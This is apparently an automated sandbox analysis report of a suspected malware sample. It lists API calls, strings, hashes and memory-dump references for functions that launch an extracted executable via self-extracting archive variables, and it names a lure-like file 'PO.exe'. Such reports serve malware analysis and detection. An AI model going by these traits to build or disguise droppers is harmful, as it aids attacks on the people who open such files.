SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C8063D
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C80653
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C80693
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C8069D
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C806AC
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C806CF
SendMessageW.USER32(00000000,000000C2,00000000,00C960E8), ref: 00C806DA

Strings

\, xrefs: 00C80643

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: f216a0fce3808111d524e802f4c44a6b6580acbc39425a36c2c9ac9067556c41
Instruction ID: 2286d4497aeccce1e72eea5a1f5c8e33c351ee9bd9871b41d611dd4e2014a1c8
Opcode Fuzzy Hash: f216a0fce3808111d524e802f4c44a6b6580acbc39425a36c2c9ac9067556c41
Instruction Fuzzy Hash: 302128712857447BE311FB249C45FAF7B9CEF82718F110619FA50E61D0DBA54A088BAA

Function 00C80870 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 179
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 00C8099E
IsWindowVisible.USER32(?), ref: 00C809D7
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00C809E3
WaitForInputIdle.USER32(?,000007D0), ref: 00C809F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00C80A1B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C80A41
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00C80AD0

Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9

Strings

.inf, xrefs: 00C8095A
, xrefs: 00C808F0
.exe, xrefs: 00C80A4B

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
String ID: $.exe$.inf
API String ID: 1693144567-2452507128
Opcode ID: d87237045e0a1f15960d5dc5110b8605d260294697ce20285e7fc5425fcf79d6
Instruction ID: 7cc4b17279501eecf43f958f77519c9c945ea26bc53532d1a3f5b3899c0d7d4f
Opcode Fuzzy Hash: d87237045e0a1f15960d5dc5110b8605d260294697ce20285e7fc5425fcf79d6
Instruction Fuzzy Hash: BF51B3715053809BE771BF64D844BAFB7E8EF81708F24081DE4E1A7191D7B18A8CE75A

Function 00C73940 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00C73945
_wcschr.LIBVCRUNTIME ref: 00C73963
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00C73927,?), ref: 00C7397E

Part of subcall function 00C76B87: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C73269,00000000,?,?), ref: 00C76BA3

Strings

R, xrefs: 00C73A95
*messages***, xrefs: 00C73A83
*messages***, xrefs: 00C73A4A
a, xrefs: 00C73A9F

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
String ID: *messages***$*messages***$R$a
API String ID: 803915177-2900423073
Opcode ID: 421443c80b64b45b5b085880850757d4e140d055eede7f72f5a15eadd6fc1a93
Instruction ID: ecfab4ddbcd58441c2d7e247aefaea85c6b4270310f406eef7ee1a8e5934f5a8
Opcode Fuzzy Hash: 421443c80b64b45b5b085880850757d4e140d055eede7f72f5a15eadd6fc1a93
Instruction Fuzzy Hash: FF9148B1A002859BDB30EFA8CC46BAE77B4EF44310F10C569E69DA7191DB709B84EB54

Function 00C7FF9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNELBASE(00000800,?), ref: 00C7FFB5
_swprintf.LIBCMT ref: 00C7FFE9

Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3

SetDlgItemTextW.USER32(?,00000066,00CB9732), ref: 00C80009
_wcschr.LIBVCRUNTIME ref: 00C8003C
EndDialog.USER32(?,00000001), ref: 00C8011D

Strings

%s%s%u, xrefs: 00C7FFDE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 2d6a2ad6392e1505cde758a1eaf233a4002f27e3f2ab25570059e3bd6480ea81
Instruction ID: 8fe5a0c633280e92e28b6fac506521bb9d0b7db3d3f3b6c0f331063865dabf9e
Opcode Fuzzy Hash: 2d6a2ad6392e1505cde758a1eaf233a4002f27e3f2ab25570059e3bd6480ea81
Instruction Fuzzy Hash: A3416271900218AEEF65EB60DC85FEE77BCEB04305F1080A6F609E6051EF749B899F60

Function 00C8C21A Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C87C2A,00C87C2A,?,?,?,00C8C46B,00000001,00000001,91E85006), ref: 00C8C274
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C8C46B,00000001,00000001,91E85006,?,?,?), ref: 00C8C2FA
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,91E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8C3F4
__freea.LIBCMT ref: 00C8C401

Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A

__freea.LIBCMT ref: 00C8C40A
__freea.LIBCMT ref: 00C8C42F

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 75e90c1623ff396cf5c63c9d74563399f9e84672e7323fd0f523228bbf0e0938
Instruction ID: 89aa5f7f68d07b60c2b13c63d4ac4a84ec9933e3de35a2d4a898d35b313d6cfa
Opcode Fuzzy Hash: 75e90c1623ff396cf5c63c9d74563399f9e84672e7323fd0f523228bbf0e0938
Instruction Fuzzy Hash: 3851F172600216ABDB25AE64CCD1FBF37A9EB84758F244229FC14D6190EB34DD81D7B8

Function 00C764F3 Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00C76551

Part of subcall function 00C729F2: GetVersionExW.KERNEL32(?), ref: 00C72A17

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C76573
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7658D
TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00C7659E
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C765AE
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C765BA

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: d2126592b2e7ac35a7d115d8adf7d3897d3eb109d618362efa905b6771d00511
Instruction ID: abc3cd19e4376491543e07d6837f557554cc6b4a7f87191cf8c0848fb67ef9ba
Opcode Fuzzy Hash: d2126592b2e7ac35a7d115d8adf7d3897d3eb109d618362efa905b6771d00511
Instruction Fuzzy Hash: A431D37A1083459FC740DFA9D8849ABB7E8FF98704F44991EF999C3210EB30D549CB6A

Function 00C7DEFE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00C7DF15
SHAutoComplete.SHLWAPI(?,00000010), ref: 00C7DF4C

Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C7DF3C

Strings

@Ut, xrefs: 00C7DF4C
EDIT, xrefs: 00C7DF20, 00C7DF2B, 00C7DF38

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 05f88effb88fc33c9f6959e1a7794d62165ffa4a1f2402e7cfc6a4aabd8f31b2
Instruction ID: aaf8d2022c6a6425b11b4622df7fafe877838b553ab7330223cf5d2ef699031e
Opcode Fuzzy Hash: 05f88effb88fc33c9f6959e1a7794d62165ffa4a1f2402e7cfc6a4aabd8f31b2
Instruction Fuzzy Hash: 87F0AE3260561877DB30A6549C0DF9F777C9F46B01F454166FD05F2180D7A0DD0685F9

Function 00C7DF6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF

OleInitialize.OLE32(00000000), ref: 00C7DF85
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7DFBC
SHGetMalloc.SHELL32(00CB86E0), ref: 00C7DFC6

Strings

3So, xrefs: 00C7DF9D
riched20.dll, xrefs: 00C7DF74

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3So
API String ID: 3498096277-3464455743
Opcode ID: 11bd4bd88d8e7650a7664c6bcc5d93d99eec0d8001152d911d16019ac6419fae
Instruction ID: 1fb4dd3413e89ffb56e7ff792e2e43b5bda5751d63c4885d9c03f1d7b9e0a734
Opcode Fuzzy Hash: 11bd4bd88d8e7650a7664c6bcc5d93d99eec0d8001152d911d16019ac6419fae
Instruction Fuzzy Hash: FEF012B1D00109ABCB10AFA9D849AEFFFFCEF94711F00416BE814E2251DBB556069FA1

Function 00C80CA3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C80CB9
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C80CF5

Strings

sfxcmd, xrefs: 00C80CB4
sfxpar, xrefs: 00C80CF0

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c7ec5a02f615fb483e477089eb3e0119ae0297f9967db87f65293360fe93669f
Instruction ID: c6338a185a13a392591164420f3d4c4465dd9936c82b3540cbaccf33f64127b3
Opcode Fuzzy Hash: c7ec5a02f615fb483e477089eb3e0119ae0297f9967db87f65293360fe93669f
Instruction Fuzzy Hash: BAF0EC72501624A7CB613FA4DC49FBE7B9CEF14B91F100126FD8896041D6A18D41E7F6

Function 00C71D7B Relevance: 6.1, APIs: 4, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000), ref: 00C71DFB
GetLastError.KERNEL32(?,?,00000000,00000003,-00000001,00000000), ref: 00C71E08
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E3D
GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E45

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 461b60e9fffca10ff312a9b217b1604c9dac9b78afba43d4b15cb6c784d1c3ed
Instruction ID: e6f04cca9dd679b1be661017a2caa5aea7a312fd3d1d515d93e931bb007d051a
Opcode Fuzzy Hash: 461b60e9fffca10ff312a9b217b1604c9dac9b78afba43d4b15cb6c784d1c3ed
Instruction Fuzzy Hash: 873139708407816FD3219F288C49BEABBE8FB45314F188619FDA8871C1D7759988DBD0

Function 00C71C63 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C71C73
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00C71C8B
GetLastError.KERNEL32 ref: 00C71CBD
GetLastError.KERNEL32 ref: 00C71CDC

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: cfe2447a643c6b67c32b4771c6bc67960231e055a0279a10ebb996234014d61c
Instruction ID: 11014ba76ebe467e5c24c825f01300d4e5d8410aa5589aa768f7dc9079554376
Opcode Fuzzy Hash: cfe2447a643c6b67c32b4771c6bc67960231e055a0279a10ebb996234014d61c
Instruction Fuzzy Hash: D7115A35980614EFCB229FE9C944A6977ADFB15321F18C12AED2E85290D730CE40DB52

Function 00C8C63D Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00C86E7B,00000000,00000000,?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue), ref: 00C8C66F
GetLastError.KERNEL32(?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue,00C984D8,00C984E0,00000000,00000364,?,00C8B1F4), ref: 00C8C67B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue,00C984D8,00C984E0,00000000), ref: 00C8C689

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e068907d6eb0d01ac48676ace355996f041a81e4796f5c518e43da786e193574
Instruction ID: acb7829787995e49e44ec73573a2f4495545c6d21f140c1e6746127024646cd2
Opcode Fuzzy Hash: e068907d6eb0d01ac48676ace355996f041a81e4796f5c518e43da786e193574
Instruction Fuzzy Hash: CA01F732641622ABC7225A799C88B5E7798AF057657201231F91AD7180EB30D900C7F8

Function 00C7E7E2 Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7E7F3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7E804
TranslateMessage.USER32(?), ref: 00C7E80E
DispatchMessageW.USER32(?), ref: 00C7E818

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 72940928b04931cce24fa117535a72a1a150ef90178ca549f984e16703419ce0
Instruction ID: ab8a089e8bafd5436487d25642aafe61b4ec2a41487d19db2f54bf4376a9946d
Opcode Fuzzy Hash: 72940928b04931cce24fa117535a72a1a150ef90178ca549f984e16703419ce0
Instruction Fuzzy Hash: A0E05972D0212EB78B20ABE6AC4CFDF7F6CEE066A1B01456BB51DD2050D6249516C7F1

Function 00C782C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 294COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C78630

Part of subcall function 00C79058: __EH_prolog.LIBCMT ref: 00C7905D

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7834F

Part of subcall function 00C79058: new.LIBCMT ref: 00C790B6

Strings

PO.exe, xrefs: 00C782E9, 00C782EE, 00C78307, 00C78316, 00C78413, 00C78435, 00C78540, 00C78675, 00C786D3

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_memcmp
String ID: PO.exe
API String ID: 2326347333-3005272355
Opcode ID: 90597ee59536622addecd25ad1a088c6b45bb3a2b21f1f2e2597de4b017471ec
Instruction ID: e745bd42426d97e197e20208e7bd6593aebc824a1d9ad2f4d8a8754e277eea38
Opcode Fuzzy Hash: 90597ee59536622addecd25ad1a088c6b45bb3a2b21f1f2e2597de4b017471ec
Instruction Fuzzy Hash: B0B11870588241DFD724EB28EC89B2D3BA5F781714F048359FE69832B2DA309D49E756

Function 00C79058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C7905D
new.LIBCMT ref: 00C790B6

Strings

PO.exe, xrefs: 00C7906C, 00C79080, 00C79086, 00C7909C, 00C790A2, 00C790DA

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: H_prolog
String ID: PO.exe
API String ID: 3519838083-3005272355
